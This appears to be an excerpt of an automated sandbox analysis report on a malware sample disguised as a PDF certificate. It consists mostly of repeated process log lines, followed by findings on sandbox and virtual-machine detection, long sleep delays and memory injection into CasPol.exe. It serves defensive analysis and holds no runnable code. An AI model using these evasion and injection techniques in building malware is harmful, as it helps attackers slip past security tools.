Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Opens the same file many times (likely Sandbox evasion)

Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe

File opened: C:\Windows\resources\0409\Praktikerens\Ssygt\Adobos\Arbejdsstykker.ini count: 82170

Jump to behavior

Switches to a custom stack to bypass stack traces

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe

API/Special instruction interceptor: Address: 458F450

Tries to detect Any.run

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: powershell.exe, 00000004.00000002.24020469340.0000000007620000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEDAI\0
Source: powershell.exe, 00000004.00000002.24023428377.0000000008B80000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE&

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Memory allocated: 219A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Memory allocated: 219A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Memory allocated: 239A0000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Memory allocated: 10A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Memory allocated: 2ED0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Memory allocated: 4ED0000 memory commit \| memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9931	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9922	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Window / User API: threadDelayed 8028	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Window / User API: foregroundWindowGot 1694	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4536	Thread sleep count: 9922 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 7804	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 6268	Thread sleep time: -74500s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 6268	Thread sleep time: -4014000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 2984	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Code function: 0_2_004065DA FindFirstFileW,FindClose,		0_2_004065DA
Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Code function: 0_2_004059A9 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,		0_2_004059A9

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: powershell.exe, 00000004.00000002.24112781122.000000000D4D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: powershell.exe, 00000004.00000002.24112781122.000000000D4D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: powershell.exe, 00000004.00000002.24112781122.000000000D4D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicshutdown
Source: powershell.exe, 00000004.00000002.24112781122.000000000D4D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: powershell.exe, 00000004.00000002.24023428377.0000000008B80000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe&
Source: powershell.exe, 00000004.00000002.24112781122.000000000D4D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: powershell.exe, 00000004.00000002.24112781122.000000000D4D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: powershell.exe, 00000004.00000002.24112781122.000000000D4D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicvss
Source: CasPol.exe, 00000005.00000002.28382435662.000000000519B000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.28382435662.00000000051F4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000004.00000002.24112781122.000000000D4D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: powershell.exe, 00000004.00000002.24112781122.000000000D4D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: powershell.exe, 00000004.00000002.24112781122.000000000D4D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: powershell.exe, 00000004.00000002.24112781122.000000000D4D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicheartbeat
Source: powershell.exe, 00000004.00000002.24020469340.0000000007620000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exedaI\0

Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe

API call chain: ExitProcess graph end node

graph_0-3525

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 4_2_0323D7E4 LdrInitializeThunk,

4_2_0323D7E4

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe base: B00000

Jump to behavior

